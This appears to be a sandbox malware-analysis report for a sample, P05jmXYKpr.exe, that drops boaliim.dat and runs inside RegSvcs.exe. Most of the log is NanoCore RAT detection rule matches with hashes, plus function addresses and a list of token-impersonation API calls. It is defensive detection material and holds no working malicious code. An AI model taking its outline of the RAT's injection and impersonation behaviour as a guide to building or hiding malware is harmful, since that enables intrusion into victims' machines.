Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000003.511336975.00000000074D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000003.511098071.00000000074D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_0095848E 0_2_0095848E
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_00966CDC 0_2_00966CDC
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_00964088 0_2_00964088
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_009600B7 0_2_009600B7
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_009540FE 0_2_009540FE
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_009751C9 0_2_009751C9
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_00967153 0_2_00967153
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_009662CA 0_2_009662CA
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_009532F7 0_2_009532F7
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_009643BF 0_2_009643BF
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_0095C426 0_2_0095C426
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_0097D440 0_2_0097D440
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_0095F461 0_2_0095F461
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_009677EF 0_2_009677EF
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_0097D8EE 0_2_0097D8EE
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_0095286B 0_2_0095286B
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_0095E9B7 0_2_0095E9B7
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_009819F4 0_2_009819F4
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_00963E0B 0_2_00963E0B
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_00974F9A 0_2_00974F9A
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_0095EFE2 0_2_0095EFE2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_00278037 7_2_00278037
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_00272007 7_2_00272007
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_0026E0BE 7_2_0026E0BE
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_0025E1A0 7_2_0025E1A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_0025225D 7_2_0025225D
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_0028A28E 7_2_0028A28E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002722C2 7_2_002722C2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_0026C59E 7_2_0026C59E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002DC7A3 7_2_002DC7A3
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_0028E89F 7_2_0028E89F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002C291A 7_2_002C291A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_00286AFB 7_2_00286AFB
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002B8B27 7_2_002B8B27
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_0027CE30 7_2_0027CE30
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_00287169 7_2_00287169
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002E51D2 7_2_002E51D2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_00259240 7_2_00259240
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_00259499 7_2_00259499
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_00271724 7_2_00271724
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_00271A96 7_2_00271A96
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_00259B60 7_2_00259B60
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_00277BAB 7_2_00277BAB
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_00271D40 7_2_00271D40
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_00277DDA 7_2_00277DDA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002B1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 7_2_002B1A91
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Section loaded: dxgidebug.dll
Source: P05jmXYKpr.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
